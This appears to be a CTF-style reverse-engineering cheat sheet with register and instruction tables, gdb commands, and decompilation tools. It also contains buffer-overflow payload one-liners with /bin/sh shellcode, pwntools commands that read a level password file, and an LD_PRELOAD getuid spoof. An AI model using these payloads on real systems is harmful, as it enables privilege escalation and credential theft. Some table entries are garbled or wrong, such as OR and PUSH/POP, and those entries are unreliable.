| x64 | x32 | What is ? |
|---|---|---|
| RAX | EAX | Return Value |
| RCX | ECX | Counter (or Fourth Arg) |
| RDX | EDX | Third Arg |
| RSI | ESI | Second Arg |
| RDI | EDI | First Arg of Function |
| RSP | ESP | Stack Pointer |
| RIP | EIP | Next Instruction |
| R8-R11 | r8d-r11d | Scratch register |
| R12-R15 | r12d-r15d | Preserved register |
| Operation | Explication |
|---|---|
| MOV size dest,src | dest ← src |
| LEA dest,[op] | dest ← addr op |
| PUSH op | Increase RSP & Store op |
| POP op | Load op & Discrease RSP |
| ADD op1,op2 | op1 ← op1 + op2 |
| SUB op1,op2 | op1 ← op1 - op2 |
| NEG reg | reg ← -reg |
| INC reg | reg ← reg + 1 |
| DEC reg | reg ← reg - 1 |
| AND op1,op2 | op1 ← op1 & op2 |
| OR op1,op2 | op1 ← op1 |
| XOR op1,op2 | op1 ← op1 ^ op2 |
| CMP op1,op2 | op1 - op2 |
| TEST op1,op2 | op1 & op2 |
| JMP op | Jump to op |
(python -c "import struct; print('A' * (100 - 0) + struct.pack('<I', 0xffffffff))")(python -c "import struct; print('\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80' + 'A' * (100 - 21) + struct.pack('<I', 0xffffffff))")python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.cat('/home/users/level05/.pass')); print(shell); print(len(shell))"python -c "import pwn; shell = pwn.asm(pwn.shellcraft.i386.linux.sh()); print(shell); print(len(shell))"\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80
21
b *0x12345678 # Breakpoint
b strcpy # Breakpoint
r # Run program
r < <(echo lol) # Run with pipe
r arg1 arg2 # Run with arg
c # Continue
n # Next operation
set $eax=0x00 # Set variable
info register # Show Registerx/s "string"
x/d 53
x/x 0xff
help x
print $raxx/10s **(char***)&environgit clone https://github.com/longld/peda.git ~/.peda
echo "source ~/.peda/peda.py" >> ~/.gdbinit
echo "DONE! debug your program with gdb and enjoy"let result = '';
[...document.querySelectorAll('.LinearDisassemblyLine')].forEach(parent_elmt => {
[...parent_elmt.children].forEach(children_elmt => {
result += children_elmt.textContent
});
result += '\n'
});
console.log(result);- Recreate getuid function
uid_t getuid(void)
{
return (4242);
}- compile
gcc -shared -fpic lib.c -o libnike.so -m32- run and inject
LD_PRELOAD=./libnike.so ./execConvert executable into .pyc
git clone https://github.com/extremecoders-re/pyinstxtractor
cd pyinstxtractor
python3 pyinstxtractor.py execDisassembly .pyc (compatible python 3.9.2)
git clone https://github.com/zrax/pycdc
cd pycdc
cmake
make
./pycdc file.pyc # Convert .pyc into .py
./pycdas file.pyc # Convert .pyc into byte-code disassemblysudo pip3 install oletoolsolevba -c file.pptm